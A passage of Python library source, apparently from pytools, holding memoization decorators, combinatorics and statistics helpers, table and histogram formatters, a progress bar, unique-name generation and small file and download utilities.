return getattr(obj, cache_dict_name)[cache_key]
except AttributeError:
result = function(obj, *args, **kwargs)
object.__setattr__(obj, cache_dict_name, {cache_key: result})
return result
except KeyError:
result = function(obj, *args, **kwargs)
getattr(obj, cache_dict_name)[cache_key] = result
return result
def clear_cache(obj):
object.__delattr__(obj, cache_dict_name)
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, function)
new_wrapper.clear_cache = clear_cache
return new_wrapper
class keyed_memoize_method(keyed_memoize_on_first_arg): # noqa: N801
"""Like :class:`memoize_method`, but additionally uses a function *key* to
compute the key under which the function result is stored.
Supports cache deletion via ``method_name.clear_cache(self)``.
:arg key: A function receiving the same arguments as the decorated function
which computes and returns the cache key.
.. versionadded :: 2020.3
.. versionchanged:: 2021.2
Can memoize methods on classes that do not allow setting attributes
(e.g. by overwritting ``__setattr__``), e.g. frozen :mod:`dataclasses`.
"""
def _default_cache_dict_name(self, function):
return intern(f"_memoize_dic_{function.__name__}")
def memoize_method_with_uncached(uncached_args=None, uncached_kwargs=None):
"""Supports cache deletion via ``method_name.clear_cache(self)``.
:arg uncached_args: a list of argument numbers
(0-based, not counting 'self' argument)
"""
from warnings import warn
warn("memoize_method_with_uncached is deprecated and will go away in 2022. "
"Use memoize_method_with_key instead",
DeprecationWarning,
stacklevel=2)
if uncached_args is None:
uncached_args = []
if uncached_kwargs is None:
uncached_kwargs = set()
# delete starting from the end
uncached_args = sorted(uncached_args, reverse=True)
uncached_kwargs = list(uncached_kwargs)
def parametrized_decorator(method):
cache_dict_name = intern(f"_memoize_dic_{method.__name__}")
def wrapper(self, *args, **kwargs):
cache_args = list(args)
cache_kwargs = kwargs.copy()
for i in uncached_args:
if i < len(cache_args):
cache_args.pop(i)
cache_args = tuple(cache_args)
if kwargs:
for name in uncached_kwargs:
cache_kwargs.pop(name, None)
key = (
(_HasKwargs, frozenset(cache_kwargs.items()))
+ cache_args)
else:
key = cache_args
try:
return getattr(self, cache_dict_name)[key]
except AttributeError:
result = method(self, *args, **kwargs)
object.__setattr__(self, cache_dict_name, {key: result})
return result
except KeyError:
result = method(self, *args, **kwargs)
getattr(self, cache_dict_name)[key] = result
return result
def clear_cache(self):
object.__delattr__(self, cache_dict_name)
if sys.version_info >= (2, 5):
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, method)
new_wrapper.clear_cache = clear_cache
return new_wrapper
return parametrized_decorator
class memoize_in: # noqa
"""Adds a cache to the function it decorates. The cache is attached
to *container* and must be uniquely specified by *identifier* (i.e.
all functions using the same *container* and *identifier* will be using
the same cache). The decorated function may only receive positional
arguments.
.. note::
This function works well on nested functions, which
do not have stable global identifiers.
.. versionchanged :: 2020.3
*identifier* no longer needs to be a :class:`str`,
but it needs to be hashable.
.. versionchanged:: 2021.2.1
Can now use instances of classes as *container* that do not allow
setting attributes (e.g. by overwritting ``__setattr__``),
e.g. frozen :mod:`dataclasses`.
"""
def __init__(self, container: Any, identifier: Hashable) -> None:
try:
memoize_in_dict = container._pytools_memoize_in_dict
except AttributeError:
memoize_in_dict = {}
object.__setattr__(container, "_pytools_memoize_in_dict",
memoize_in_dict)
self.cache_dict = memoize_in_dict.setdefault(identifier, {})
def __call__(self, inner: F) -> F:
@wraps(inner)
def new_inner(*args):
try:
return self.cache_dict[args]
except KeyError:
result = inner(*args)
self.cache_dict[args] = result
return result
# NOTE: mypy gets confused because it types `wraps` as
# Callable[[VarArg(Any)], Any]
# which, for some reason, is not compatible with `F`
return new_inner # type: ignore[return-value]
class keyed_memoize_in: # noqa
"""Like :class:`memoize_in`, but additionally uses a function *key* to
compute the key under which the function result is memoized.
:arg key: A function receiving the same arguments as the decorated function
which computes and returns the cache key.
.. versionadded :: 2021.2.1
"""
def __init__(self, container, identifier, key):
try:
memoize_in_dict = container._pytools_keyed_memoize_in_dict
except AttributeError:
memoize_in_dict = {}
object.__setattr__(container, "_pytools_keyed_memoize_in_dict",
memoize_in_dict)
self.cache_dict = memoize_in_dict.setdefault(identifier, {})
self.key = key
def __call__(self, inner):
@wraps(inner)
def new_inner(*args):
key = self.key(*args)
try:
return self.cache_dict[key]
except KeyError:
result = inner(*args)
self.cache_dict[key] = result
return result
return new_inner
# }}}
# {{{ syntactical sugar
class InfixOperator:
"""Pseudo-infix operators that allow syntax of the kind `op1 <<operator>> op2'.
Following a recipe from
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/384122
"""
def __init__(self, function):
self.function = function
def __rlshift__(self, other):
return InfixOperator(lambda x: self.function(other, x))
def __rshift__(self, other):
return self.function(other)
def call(self, a, b):
return self.function(a, b)
def monkeypatch_method(cls):
# from GvR, http://mail.python.org/pipermail/python-dev/2008-January/076194.html
def decorator(func):
setattr(cls, func.__name__, func)
return func
return decorator
def monkeypatch_class(_name, bases, namespace):
# from GvR, http://mail.python.org/pipermail/python-dev/2008-January/076194.html
assert len(bases) == 1, "Exactly one base class required"
base = bases[0]
for name, value in namespace.items():
if name != "__metaclass__":
setattr(base, name, value)
return base
# }}}
# {{{ generic utilities
def add_tuples(t1, t2):
return tuple([t1v + t2v for t1v, t2v in zip(t1, t2)])
def negate_tuple(t1):
return tuple([-t1v for t1v in t1])
def shift(vec, dist):
"""Return a copy of *vec* shifted by *dist* such that
.. code:: python
shift(a, i)[j] == a[(i+j) % len(a)]
"""
result = vec[:]
N = len(vec) # noqa
dist = dist % N
# modulo only returns positive distances!
if dist > 0:
result[dist:] = vec[:N-dist]
result[:dist] = vec[N-dist:]
return result
def len_iterable(iterable):
return sum(1 for i in iterable)
def flatten(iterable):
"""For an iterable of sub-iterables, generate each member of each
sub-iterable in turn, i.e. a flattened version of that super-iterable.
Example: Turn [[a,b,c],[d,e,f]] into [a,b,c,d,e,f].
"""
for sublist in iterable:
yield from sublist
def general_sum(sequence):
return reduce(operator.add, sequence)
def linear_combination(coefficients, vectors):
result = coefficients[0] * vectors[0]
for c, v in zip(coefficients[1:], vectors[1:]):
result += c*v
return result
def common_prefix(iterable, empty=None):
it = iter(iterable)
try:
pfx = next(it)
except StopIteration:
return empty
for v in it:
for j, pfx_j in enumerate(pfx):
if pfx_j != v[j]:
pfx = pfx[:j]
if j == 0:
return pfx
break
return pfx
def decorate(function, iterable):
return [(x, function(x)) for x in iterable]
def partition(criterion, iterable):
part_true = []
part_false = []
for i in iterable:
if criterion(i):
part_true.append(i)
else:
part_false.append(i)
return part_true, part_false
def partition2(iterable):
part_true = []
part_false = []
for pred, i in iterable:
if pred:
part_true.append(i)
else:
part_false.append(i)
return part_true, part_false
def product(iterable: Iterable[Any]) -> Any:
from operator import mul
return reduce(mul, iterable, 1)
def reverse_dictionary(the_dict):
result = {}
for key, value in the_dict.items():
if value in result:
raise RuntimeError(
f"non-reversible mapping, duplicate key '{value}'")
result[value] = key
return result
def set_sum(set_iterable):
from operator import or_
return reduce(or_, set_iterable, set())
def div_ceil(nr, dr):
return -(-nr // dr)
def uniform_interval_splitting(n, granularity, max_intervals):
""" Return *(interval_size, num_intervals)* such that::
num_intervals * interval_size >= n
and::
(num_intervals - 1) * interval_size < n
and *interval_size* is a multiple of *granularity*.
"""
# ported from Thrust
grains = div_ceil(n, granularity)
# one grain per interval
if grains <= max_intervals:
return granularity, grains
grains_per_interval = div_ceil(grains, max_intervals)
interval_size = grains_per_interval * granularity
num_intervals = div_ceil(n, interval_size)
return interval_size, num_intervals
def find_max_where(predicate, prec=1e-5, initial_guess=1, fail_bound=1e38):
"""Find the largest value for which a predicate is true,
along a half-line. 0 is assumed to be the lower bound."""
# {{{ establish bracket
mag = initial_guess
if predicate(mag):
mag *= 2
while predicate(mag):
mag *= 2
if mag > fail_bound:
raise RuntimeError("predicate appears to be true "
f"everywhere, up to {fail_bound:g}")
lower_true = mag/2
upper_false = mag
else:
mag /= 2
while not predicate(mag):
mag /= 2
if mag < prec:
return mag
lower_true = mag
upper_false = mag*2
# }}}
# {{{ refine
# Refine a bracket between *lower_true*, where the predicate is true,
# and *upper_false*, where it is false, until *prec* is satisfied.
assert predicate(lower_true)
assert not predicate(upper_false)
while abs(lower_true-upper_false) > prec:
mid = (lower_true+upper_false)/2
if predicate(mid):
lower_true = mid
else:
upper_false = mid
return lower_true
# }}}
# }}}
# {{{ argmin, argmax
def argmin2(iterable, return_value=False):
it = iter(iterable)
try:
current_argmin, current_min = next(it)
except StopIteration:
raise ValueError("argmin of empty iterable")
for arg, item in it:
if item < current_min:
current_argmin = arg
current_min = item
if return_value:
return current_argmin, current_min
else:
return current_argmin
def argmax2(iterable, return_value=False):
it = iter(iterable)
try:
current_argmax, current_max = next(it)
except StopIteration:
raise ValueError("argmax of empty iterable")
for arg, item in it:
if item > current_max:
current_argmax = arg
current_max = item
if return_value:
return current_argmax, current_max
else:
return current_argmax
def argmin(iterable):
return argmin2(enumerate(iterable))
def argmax(iterable):
return argmax2(enumerate(iterable))
# }}}
# {{{ cartesian products etc.
def cartesian_product(*args):
if len(args) == 1:
for arg in args[0]:
yield (arg,)
return
first = args[:-1]
for prod in cartesian_product(*first):
for i in args[-1]:
yield prod + (i,)
def distinct_pairs(list1, list2):
for i, xi in enumerate(list1):
for j, yj in enumerate(list2):
if i != j:
yield (xi, yj)
def cartesian_product_sum(list1, list2):
"""This routine returns a list of sums of each element of
list1 with each element of list2. Also works with lists.
"""
for i in list1:
for j in list2:
yield i+j
# }}}
# {{{ elementary statistics
def average(iterable):
"""Return the average of the values in iterable.
iterable may not be empty.
"""
it = iterable.__iter__()
try:
s = next(it)
count = 1
except StopIteration:
raise ValueError("empty average")
for value in it:
s = s + value
count += 1
return s/count
class VarianceAggregator:
"""Online variance calculator.
See http://en.wikipedia.org/wiki/Algorithms_for_calculating_variance
Adheres to pysqlite's aggregate interface.
"""
def __init__(self, entire_pop):
self.n = 0
self.mean = 0
self.m2 = 0
self.entire_pop = entire_pop
def step(self, x):
self.n += 1
delta_ = x - self.mean
self.mean += delta_/self.n
self.m2 += delta_*(x - self.mean)
def finalize(self):
if self.entire_pop:
if self.n == 0:
return None
else:
return self.m2/self.n
else:
if self.n <= 1:
return None
else:
return self.m2/(self.n - 1)
def variance(iterable, entire_pop):
v_comp = VarianceAggregator(entire_pop)
for x in iterable:
v_comp.step(x)
return v_comp.finalize()
def std_deviation(iterable, finite_pop):
from math import sqrt
return sqrt(variance(iterable, finite_pop))
# }}}
# {{{ permutations, tuples, integer sequences
def wandering_element(length, wanderer=1, landscape=0):
for i in range(length):
yield i*(landscape,) + (wanderer,) + (length-1-i)*(landscape,)
def indices_in_shape(shape):
from warnings import warn
warn("indices_in_shape is deprecated. You should prefer numpy.ndindex.",
DeprecationWarning, stacklevel=2)
if isinstance(shape, int):
shape = (shape,)
if not shape:
yield ()
elif len(shape) == 1:
for i in range(0, shape[0]):
yield (i,)
else:
remainder = shape[1:]
for i in range(0, shape[0]):
for rest in indices_in_shape(remainder):
yield (i,)+rest
def generate_nonnegative_integer_tuples_below(n, length=None, least=0):
"""n may be a sequence, in which case length must be None."""
if length is None:
if not n:
yield ()
return
my_n = n[0]
n = n[1:]
next_length = None
else:
my_n = n
assert length >= 0
if length == 0:
yield ()
return
next_length = length-1
for i in range(least, my_n):
my_part = (i,)
for base in generate_nonnegative_integer_tuples_below(n, next_length, least):
yield my_part + base
def generate_decreasing_nonnegative_tuples_summing_to(
n, length, min_value=0, max_value=None):
if length == 0:
yield ()
elif length == 1:
if n <= max_value:
#print "MX", n, max_value
yield (n,)
else:
return
else:
if max_value is None or n < max_value:
max_value = n
for i in range(min_value, max_value+1):
#print "SIG", sig, i
for remainder in generate_decreasing_nonnegative_tuples_summing_to(
n-i, length-1, min_value, i):
yield (i,) + remainder
def generate_nonnegative_integer_tuples_summing_to_at_most(n, length):
"""Enumerate all non-negative integer tuples summing to at most n,
exhausting the search space by varying the first entry fastest,
and the last entry the slowest.
"""
assert length >= 0
if length == 0:
yield ()
else:
for i in range(n+1):
for remainder in generate_nonnegative_integer_tuples_summing_to_at_most(
n-i, length-1):
yield remainder + (i,)
# backwards compatibility
generate_positive_integer_tuples_below = generate_nonnegative_integer_tuples_below
def _pos_and_neg_adaptor(tuple_iter):
for tup in tuple_iter:
nonzero_indices = [i for i in range(len(tup)) if tup[i] != 0]
for do_neg_tup in generate_nonnegative_integer_tuples_below(
2, len(nonzero_indices)):
this_result = list(tup)
for index, do_neg in enumerate(do_neg_tup):
if do_neg:
this_result[nonzero_indices[index]] *= -1
yield tuple(this_result)
def generate_all_integer_tuples_below(n, length, least_abs=0):
return _pos_and_neg_adaptor(generate_nonnegative_integer_tuples_below(
n, length, least_abs))
def generate_permutations(original):
"""Generate all permutations of the list *original*.
Nicked from http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/252178
"""
if len(original) <= 1:
yield original
else:
for perm_ in generate_permutations(original[1:]):
for i in range(len(perm_)+1):
#nb str[0:1] works in both string and list contexts
yield perm_[:i] + original[0:1] + perm_[i:]
def generate_unique_permutations(original):
"""Generate all unique permutations of the list *original*.
"""
had_those = set()
for perm_ in generate_permutations(original):
if perm_ not in had_those:
had_those.add(perm_)
yield perm_
def enumerate_basic_directions(dimensions):
coordinate_list = [[0], [1], [-1]]
return reduce(cartesian_product_sum, [coordinate_list] * dimensions)[1:]
# }}}
# {{{ index mangling
def get_read_from_map_from_permutation(original, permuted):
"""With a permutation given by *original* and *permuted*,
generate a list *rfm* of indices such that
``permuted[i] == original[rfm[i]]``.
Requires that the permutation can be inferred from
*original* and *permuted*.
.. doctest ::
>>> for p1 in generate_permutations(list(range(5))):
... for p2 in generate_permutations(list(range(5))):
... rfm = get_read_from_map_from_permutation(p1, p2)
... p2a = [p1[rfm[i]] for i in range(len(p1))]
... assert p2 == p2a
"""
from warnings import warn
warn("get_read_from_map_from_permutation is deprecated and will be "
"removed in 2019", DeprecationWarning, stacklevel=2)
assert len(original) == len(permuted)
where_in_original = {
original[i]: i for i in range(len(original))}
assert len(where_in_original) == len(original)
return tuple(where_in_original[pi] for pi in permuted)
def get_write_to_map_from_permutation(original, permuted):
"""With a permutation given by *original* and *permuted*,
generate a list *wtm* of indices such that
``permuted[wtm[i]] == original[i]``.
Requires that the permutation can be inferred from
*original* and *permuted*.
.. doctest ::
>>> for p1 in generate_permutations(list(range(5))):
... for p2 in generate_permutations(list(range(5))):
... wtm = get_write_to_map_from_permutation(p1, p2)
... p2a = [0] * len(p2)
... for i, oi in enumerate(p1):
... p2a[wtm[i]] = oi
... assert p2 == p2a
"""
from warnings import warn
warn("get_write_to_map_from_permutation is deprecated and will be "
"removed in 2019", DeprecationWarning, stacklevel=2)
assert len(original) == len(permuted)
where_in_permuted = {
permuted[i]: i for i in range(len(permuted))}
assert len(where_in_permuted) == len(permuted)
return tuple(where_in_permuted[oi] for oi in original)
# }}}
# {{{ graph algorithms
from pytools.graph import a_star as a_star_moved
a_star = MovedFunctionDeprecationWrapper(a_star_moved)
# }}}
# {{{ formatting
# {{{ table formatting
class Table:
"""An ASCII table generator.
:arg alignments: List of alignments of each column ('l', 'c', or 'r',
for left, center, and right alignment, respectively). Columns which
have no alignment specifier will use the last specified alignment. For
example, with `alignments=['l', 'r']`, the third and all following
columns will use 'r' alignment.
.. automethod:: add_row
.. automethod:: __str__
.. automethod:: github_markdown
.. automethod:: csv
.. automethod:: latex
"""
def __init__(self, alignments=None):
self.rows = []
if alignments is not None:
self.alignments = alignments
else:
self.alignments = ["l"]
def add_row(self, row):
self.rows.append([str(i) for i in row])
def __str__(self):
"""
Returns a string representation of the table.
.. doctest ::
>>> tbl = Table(alignments=['l', 'r', 'l'])
>>> tbl.add_row([1, '|'])
>>> tbl.add_row([10, '20||'])
>>> print(tbl)
1 | |
---+------
10 | 20||
"""
columns = len(self.rows[0])
col_widths = [max(len(row[i]) for row in self.rows)
for i in range(columns)]
alignments = self.alignments
# If not all alignments were specified, extend alignments with the
# last alignment specified:
alignments += self.alignments[-1] * (columns - len(self.alignments))
lines = [" | ".join([
cell.center(col_width) if align == "c"
else cell.ljust(col_width) if align == "l"
else cell.rjust(col_width)
for cell, col_width, align in zip(row, col_widths, alignments)])
for row in self.rows]
lines[1:1] = ["+".join("-" * (col_width + 1 + (i > 0))
for i, col_width in enumerate(col_widths))]
return "\n".join(lines)
def github_markdown(self):
r"""Returns a string representation of the table formatted as
`GitHub-Flavored Markdown.
<https://docs.github.com/en/github/writing-on-github/organizing-information-with-tables>`__
.. doctest ::
>>> tbl = Table(alignments=['l', 'r', 'l'])
>>> tbl.add_row([1, '|'])
>>> tbl.add_row([10, '20||'])
>>> print(tbl.github_markdown())
1 | \|
:--|-------:
10 | 20\|\|
""" # noqa: W605
# Pipe symbols ('|') must be replaced
rows = [[w.replace("|", "\\|") for w in r] for r in self.rows]
columns = len(rows[0])
col_widths = [max(len(row[i]) for row in rows)
for i in range(columns)]
alignments = self.alignments
# If not all alignments were specified, extend alignments with the
# last alignment specified:
alignments += self.alignments[-1] * (columns - len(self.alignments))
lines = [" | ".join([
cell.center(col_width) if align == "c"
else cell.ljust(col_width) if align == "l"
else cell.rjust(col_width)
for cell, col_width, align in zip(row, col_widths, alignments)])
for row in rows]
lines[1:1] = ["|".join(
":" + "-" * (col_width - 1 + (i > 0)) + ":" if align == "c"
else ":" + "-" * (col_width + (i > 0)) if align == "l"
else "-" * (col_width + (i > 0)) + ":"
for i, (col_width, align) in enumerate(zip(col_widths, alignments)))]
return "\n".join(lines)
def csv(self, dialect="excel", csv_kwargs=None):
"""Returns a string containing a CSV representation of the table.
:arg dialect: String passed to :func:`csv.writer`.
:arg csv_kwargs: Dict of arguments passed to :func:`csv.writer`.
.. doctest ::
>>> tbl = Table()
>>> tbl.add_row([1, ","])
>>> tbl.add_row([10, 20])
>>> print(tbl.csv())
1,","
10,20
"""
import csv
import io
if csv_kwargs is None:
csv_kwargs = {}
# Default is "\r\n"
if "lineterminator" not in csv_kwargs:
csv_kwargs["lineterminator"] = "\n"
output = io.StringIO()
writer = csv.writer(output, dialect, **csv_kwargs)
writer.writerows(self.rows)
return output.getvalue().rstrip(csv_kwargs["lineterminator"])
def latex(self, skip_lines=0, hline_after=None):
r"""Returns a string containing the rows of a LaTeX representation of
the table.
:arg skip_lines: number of lines to skip at the start of the table.
:arg hline_after: list of row indices after which to add an ``hline``
(the indices must subtract *skip_lines*, if non-zero).
.. doctest::
>>> tbl = Table()
>>> tbl.add_row([0, "skipped"])
>>> tbl.add_row([1, "apple"])
>>> tbl.add_row([2, "pear"])
>>> print(tbl.latex(skip_lines=1))
1 & apple \\
2 & pear \\
"""
if hline_after is None:
hline_after = []
lines = []
for row_nr, row in enumerate(self.rows[skip_lines:]):
lines.append(fr"{' & '.join(row)} \\")
if row_nr in hline_after:
lines.append(r"\hline")
return "\n".join(lines)
# }}}
# {{{ histogram formatting
def string_histogram( # pylint: disable=too-many-arguments,too-many-locals
iterable, min_value=None, max_value=None,
bin_count=20, width=70, bin_starts=None, use_unicode=True):
if bin_starts is None:
if min_value is None or max_value is None:
iterable = list(iterable)
min_value = min(iterable)
max_value = max(iterable)
bin_width = (max_value - min_value)/bin_count
bin_starts = [min_value+bin_width*i for i in range(bin_count)]
bins = [0 for i in range(len(bin_starts))]
from bisect import bisect
for value in iterable:
if max_value is not None and value > max_value or value < bin_starts[0]:
from warnings import warn
warn("string_histogram: out-of-bounds value ignored")
else:
bin_nr = bisect(bin_starts, value)-1
try:
bins[bin_nr] += 1
except Exception:
print(value, bin_nr, bin_starts)
raise
from math import floor, ceil
if use_unicode:
def format_bar(cnt):
scaled = cnt*width/max_count
full = int(floor(scaled))
eighths = int(ceil((scaled-full)*8))
if eighths:
return full*chr(0x2588) + chr(0x2588+(8-eighths))
else:
return full*chr(0x2588)
else:
def format_bar(cnt):
return int(ceil(cnt*width/max_count))*"#"
max_count = max(bins)
total_count = sum(bins)
return "\n".join("{:9g} |{:9d} | {:3.0f} % | {}".format(
bin_start,
bin_value,
bin_value/total_count*100,
format_bar(bin_value))
for bin_start, bin_value in zip(bin_starts, bins))
# }}}
def word_wrap(text, width, wrap_using="\n"):
# http://code.activestate.com/recipes/148061-one-liner-word-wrap-function/
r"""
A word-wrap function that preserves existing line breaks
and most spaces in the text. Expects that existing line
breaks are posix newlines (``\n``).
"""
space_or_break = [" ", wrap_using]
return reduce(lambda line, word: "{}{}{}".format(
line,
space_or_break[(
len(line) - line.rfind("\n") - 1
+ len(word.split("\n", 1)[0])
) >= width],
word),
text.split(" ")
)
# }}}
# {{{ command line interfaces
def _exec_arg(arg, execenv):
import os
if os.access(arg, os.F_OK):
exec(compile(open(arg), arg, "exec"), execenv)
else:
exec(compile(arg, "<command line>", "exec"), execenv)
class CPyUserInterface:
class Parameters(Record):
pass
def __init__(self, variables, constants=None, doc=None):
if constants is None:
constants = {}
if doc is None:
doc = {}
self.variables = variables
self.constants = constants
self.doc = doc
def show_usage(self, progname):
print(f"usage: {progname} <FILE-OR-STATEMENTS>")
print()
print("FILE-OR-STATEMENTS may either be Python statements of the form")
print("'variable1 = value1; variable2 = value2' or the name of a file")
print("containing such statements. Any valid Python code may be used")
print("on the command line or in a command file. If new variables are")
print("used, they must start with 'user_' or just '_'.")
print()
print("The following variables are recognized:")
for v in sorted(self.variables):
print(f" {v} = {self.variables[v]}")
if v in self.doc:
print(f" {self.doc[v]}")
print()
print("The following constants are supplied:")
for c in sorted(self.constants):
print(f" {c} = {self.constants[c]}")
if c in self.doc:
print(f" {self.doc[c]}")
def gather(self, argv=None):
if argv is None:
argv = sys.argv
if len(argv) == 1 or (
("-h" in argv)
or ("help" in argv)
or ("-help" in argv)
or ("--help" in argv)):
self.show_usage(argv[0])
sys.exit(2)
execenv = self.variables.copy()
execenv.update(self.constants)
for arg in argv[1:]:
_exec_arg(arg, execenv)
# check if the user set invalid keys
for added_key in (
set(execenv.keys())
- set(self.variables.keys())
- set(self.constants.keys())):
if not (added_key.startswith("user_") or added_key.startswith("_")):
raise ValueError(
f"invalid setup key: '{added_key}' "
"(user variables must start with 'user_' or '_')")
result = self.Parameters({key: execenv[key] for key in self.variables})
self.validate(result)
return result
def validate(self, setup):
pass
# }}}
# {{{ debugging
class StderrToStdout:
def __enter__(self):
# pylint: disable=attribute-defined-outside-init
self.stderr_backup = sys.stderr
sys.stderr = sys.stdout
def __exit__(self, exc_type, exc_val, exc_tb):
sys.stderr = self.stderr_backup
del self.stderr_backup
def typedump(val, max_seq=5, special_handlers=None):
if special_handlers is None:
special_handlers = {}
try:
hdlr = special_handlers[type(val)]
except KeyError:
pass
else:
return hdlr(val)
try:
len(val)
except TypeError:
return type(val).__name__
else:
if isinstance(val, dict):
return "{%s}" % (
", ".join(
f"{str(k)!r}: {typedump(v)}"
for k, v in val.items()))
try:
if len(val) > max_seq:
return "{}({},...)".format(
type(val).__name__,
",".join(typedump(x, max_seq, special_handlers)
for x in val[:max_seq]))
else:
return "{}({})".format(
type(val).__name__,
",".join(typedump(x, max_seq, special_handlers)
for x in val))
except TypeError:
return val.__class__.__name__
def invoke_editor(s, filename="edit.txt", descr="the file"):
from tempfile import mkdtemp
tempdir = mkdtemp()
from os.path import join
full_name = join(tempdir, filename)
outf = open(full_name, "w")
outf.write(str(s))
outf.close()
import os
if "EDITOR" in os.environ:
from subprocess import Popen
p = Popen([os.environ["EDITOR"], full_name])
os.waitpid(p.pid, 0)
else:
print("(Set the EDITOR environment variable to be "
"dropped directly into an editor next time.)")
input(f"Edit {descr} at {full_name} now, then hit [Enter]:")
inf = open(full_name)
result = inf.read()
inf.close()
return result
# }}}
# {{{ progress bars
class ProgressBar: # pylint: disable=too-many-instance-attributes
"""
.. automethod:: draw
.. automethod:: progress
.. automethod:: set_progress
.. automethod:: finished
.. automethod:: __enter__
.. automethod:: __exit__
"""
def __init__(self, descr, total, initial=0, length=40):
import time
self.description = descr
self.total = total
self.done = initial
self.length = length
self.last_squares = -1
self.start_time = time.time()
self.last_update_time = self.start_time
self.speed_meas_start_time = self.start_time
self.speed_meas_start_done = initial
self.time_per_step = None
def draw(self):
import time
now = time.time()
squares = int(self.done/self.total*self.length)
if squares != self.last_squares or now-self.last_update_time > 0.5:
if (self.done != self.speed_meas_start_done
and now-self.speed_meas_start_time > 3):
new_time_per_step = (now-self.speed_meas_start_time) \
/ (self.done-self.speed_meas_start_done)
if self.time_per_step is not None:
self.time_per_step = (new_time_per_step + self.time_per_step)/2
else:
self.time_per_step = new_time_per_step
self.speed_meas_start_time = now
self.speed_meas_start_done = self.done
if self.time_per_step is not None:
eta_str = "{:7.1f}s ".format(
max(0, (self.total-self.done) * self.time_per_step)
)
else:
eta_str = "?"
sys.stderr.write("{:<20} [{}] ETA {}\r".format(
self.description,
squares*"#"+(self.length-squares)*" ",
eta_str))
self.last_squares = squares
self.last_update_time = now
def progress(self, steps=1):
self.set_progress(self.done + steps)
def set_progress(self, done):
self.done = done
self.draw()
def finished(self):
self.set_progress(self.total)
sys.stderr.write("\n")
def __enter__(self):
self.draw()
def __exit__(self, exc_type, exc_val, exc_tb):
self.finished()
# }}}
# {{{ file system related
def assert_not_a_file(name):
import os
if os.access(name, os.F_OK):
raise OSError(f"file `{name}' already exists")
def add_python_path_relative_to_script(rel_path):
from os.path import dirname, join, abspath
script_name = sys.argv[0]
rel_script_dir = dirname(script_name)
sys.path.append(abspath(join(rel_script_dir, rel_path)))
# }}}
# {{{ numpy dtype mangling
def common_dtype(dtypes, default=None):
dtypes = list(dtypes)
if dtypes:
return argmax2((dtype, dtype.num) for dtype in dtypes)
else:
if default is not None:
return default
else:
raise ValueError(
"cannot find common dtype of empty dtype list")
def to_uncomplex_dtype(dtype):
import numpy as np
return np.array(1, dtype=dtype).real.dtype.type
def match_precision(dtype, dtype_to_match):
import numpy
tgt_is_double = dtype_to_match in [
numpy.float64, numpy.complex128]
dtype_is_complex = dtype.kind == "c"
if dtype_is_complex:
if tgt_is_double:
return numpy.dtype(numpy.complex128)
else:
return numpy.dtype(numpy.complex64)
else:
if tgt_is_double:
return numpy.dtype(numpy.float64)
else:
return numpy.dtype(numpy.float32)
# }}}
# {{{ unique name generation
def generate_unique_names(prefix):
yield prefix
try_num = 0
while True:
yield f"{prefix}_{try_num}"
try_num += 1
UNIQUE_NAME_GEN_COUNTER_RE = re.compile(r"^(?P<based_on>\w+)_(?P<counter>\d+)$")
def generate_numbered_unique_names(
prefix: str, num: Optional[int] = None) -> Iterable[Tuple[int, str]]:
if num is None:
yield (0, prefix)
num = 0
while True:
name = f"{prefix}_{num}"
num += 1
yield (num, name)
generate_unique_possibilities = MovedFunctionDeprecationWrapper(
generate_unique_names)
class UniqueNameGenerator:
"""
.. automethod:: is_name_conflicting
.. automethod:: add_name
.. automethod:: add_names
.. automethod:: __call__
"""
def __init__(self,
existing_names: Optional[Set[str]] = None,
forced_prefix: str = ""):
if existing_names is None:
existing_names = set()
self.existing_names = existing_names.copy()
self.forced_prefix = forced_prefix
self.prefix_to_counter: Dict[str, int] = {}
def is_name_conflicting(self, name: str) -> bool:
return name in self.existing_names
def _name_added(self, name: str) -> None:
"""Callback to alert subclasses when a name has been added.
.. note::
This will not get called for the names in the *existing_names*
argument to :meth:`__init__`.
"""
pass
def add_name(self, name: str) -> None:
if self.is_name_conflicting(name):
raise ValueError(f"name '{name}' conflicts with existing names")
if not name.startswith(self.forced_prefix):
raise ValueError(
f"name '{name}' does not start with required prefix "
f"'{self.forced_prefix}'")
self.existing_names.add(name)
self._name_added(name)
def add_names(self, names: Iterable[str]) -> None:
for name in names:
self.add_name(name)
def __call__(self, based_on: str = "id") -> str:
based_on = self.forced_prefix + based_on
counter = self.prefix_to_counter.get(based_on, None)
# {{{ try to get counter from based_on if not already present
if counter is None:
counter_match = UNIQUE_NAME_GEN_COUNTER_RE.match(based_on)
if counter_match:
based_on = counter_match.groupdict()["based_on"]
counter = int(counter_match.groupdict()["counter"])
# }}}
for counter, var_name in generate_numbered_unique_names(based_on, counter): # noqa: B007,E501
if not self.is_name_conflicting(var_name):
break
self.prefix_to_counter[based_on] = counter
var_name = intern(var_name) # pylint: disable=undefined-loop-variable
self.existing_names.add(var_name)
self._name_added(var_name)
return var_name
# }}}
# {{{ recursion limit
class MinRecursionLimit:
def __init__(self, min_rec_limit):
self.min_rec_limit = min_rec_limit
def __enter__(self):
# pylint: disable=attribute-defined-outside-init
self.prev_recursion_limit = sys.getrecursionlimit()
new_limit = max(self.prev_recursion_limit, self.min_rec_limit)
sys.setrecursionlimit(new_limit)
def __exit__(self, exc_type, exc_val, exc_tb):
# Deep recursion can produce deeply nested data structures
# (or long chains of to-be gc'd generators) that cannot be
# undergo garbage collection with a lower recursion limit.
#
# As a result, it doesn't seem possible to lower the recursion limit
# again after it has been raised without causing reliability issues.
#
# See https://gitlab.tiker.net/inducer/sumpy/issues/31 for
# context.
pass
# }}}
# {{{ download from web if not present
def download_from_web_if_not_present(url, local_name=None):
"""
.. versionadded:: 2017.5
"""
from os.path import basename, exists
if local_name is None:
local_name = basename(url)
if not exists(local_name):
from pytools.version import VERSION_TEXT
from urllib.request import Request, urlopen
req = Request(url, headers={
"User-Agent": f"pytools/{VERSION_TEXT}"
})
with urlopen(req) as inf:
contents = inf.read()
with open(local_name, "wb") as outf:
outf.write(contents)
# }}}
# {{{ find git revisions
def find_git_revision(tree_root): # pylint: disable=too-many-locals
# Keep this routine self-contained so that it can be copy-pasted into
# setup.py.
from os.path import join, exists, abspath
tree_root = abspath(tree_root)
if not exists(join(tree_root, ".git")):
return None
# construct minimal environment
# stolen from
# https://github.com/numpy/numpy/blob/055ce3e90b50b5f9ef8cf1b8641c42e391f10735/setup.py#L70-L92
import os
env = {}
for k in ["SYSTEMROOT", "PATH", "HOME"]:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
